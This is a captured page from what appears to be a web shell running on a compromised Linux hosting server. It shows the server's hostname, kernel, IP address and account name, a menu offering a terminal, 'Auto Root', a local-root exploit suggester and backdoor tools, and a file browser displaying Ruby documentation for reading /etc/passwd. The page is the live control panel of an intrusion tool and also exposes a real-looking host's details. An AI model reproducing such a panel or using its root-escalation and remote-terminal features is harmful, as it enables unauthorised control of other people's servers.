Linux server1.dn-server.com 4.18.0-553.89.1.lve.el8.x86_64 #1 SMP Wed Dec 10 13:58:50 UTC 2025 x86_64
LiteSpeed
Server IP : 195.201.204.189 & Your IP : 216.73.216.37
Domains :
Cant Read [ /etc/named.conf ]
User : beriska1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby19 /
share /
ri /
1.9.1 /
system /
Etc /
Delete
Unzip
Name
Size
Permission
Date
Action
cdesc-Etc.ri
738
B
-rw-r--r--
2023-07-26 17:26
endgrent-c.ri
286
B
-rw-r--r--
2023-07-26 17:26
endpwent-c.ri
289
B
-rw-r--r--
2023-07-26 17:26
getgrent-c.ri
1.17
KB
-rw-r--r--
2023-07-26 17:26
getgrgid-c.ri
551
B
-rw-r--r--
2023-07-26 17:26
getgrnam-c.ri
539
B
-rw-r--r--
2023-07-26 17:26
getlogin-c.ri
469
B
-rw-r--r--
2023-07-26 17:26
getpwent-c.ri
1.54
KB
-rw-r--r--
2023-07-26 17:26
getpwnam-c.ri
551
B
-rw-r--r--
2023-07-26 17:26
getpwuid-c.ri
568
B
-rw-r--r--
2023-07-26 17:26
group-c.ri
573
B
-rw-r--r--
2023-07-26 17:26
passwd-c.ri
570
B
-rw-r--r--
2023-07-26 17:26
setgrent-c.ri
309
B
-rw-r--r--
2023-07-26 17:26
setpwent-c.ri
310
B
-rw-r--r--
2023-07-26 17:26
sysconfdir-c.ri
227
B
-rw-r--r--
2023-07-26 17:26
systmpdir-c.ri
221
B
-rw-r--r--
2023-07-26 17:26
Save
Rename
U:RDoc::AnyMethod[iI" getpwent:ETI"Etc::getpwent;TT:publico:RDoc::Markup::Document:@parts[o:RDoc::Markup::Paragraph; [I"OReturns an entry from the /etc/passwd file. The first time it is called it;TI"Mopens the file and returns the first entry; each successive call returns;TI"Dthe next entry, or nil if the end of the file has been reached.;To:RDoc::Markup::BlankLine o; ; [I"BTo close the file when processing is complete, call endpwent.;T@o; ; [I"0Each entry is returned as a Struct::Passwd:;T@o:RDoc::Markup::List: @type:BULLET:@items[o:RDoc::Markup::ListItem:@label0; [o; ; [I"GPasswd#name contains the short login name of the user as a String.;T@o;;0; [o; ; [I"KPasswd#passwd contains the encrypted password of the user as a String.;TI"Jan 'x' is returned if shadow passwords are in use. An '*' is returned;TI"0if the user cannot log in using a password.;T@o;;0; [o; ; [I"?Passwd#uid contains the integer user ID (uid) of the user.;T@o;;0; [o; ; [I"PPasswd#gid contains the integer group ID (gid) of the user's primary group.;T@o;;0; [o; ; [I"KPasswd#gecos contains a longer String description of the user, such as;TI"Ia full name. Some Unix systems provide structured information in the;TI"/gecos field, but this is system-dependent.;T@o;;0; [o; ; [I"PPasswd#dir contains the path to the home directory of the user as a String.;T@o;;0; [o; ; [I"OPasswd#shell contains the path to the login shell of the user as a String.;T: @file000[ I"();FI"ext/etc/etc.c;T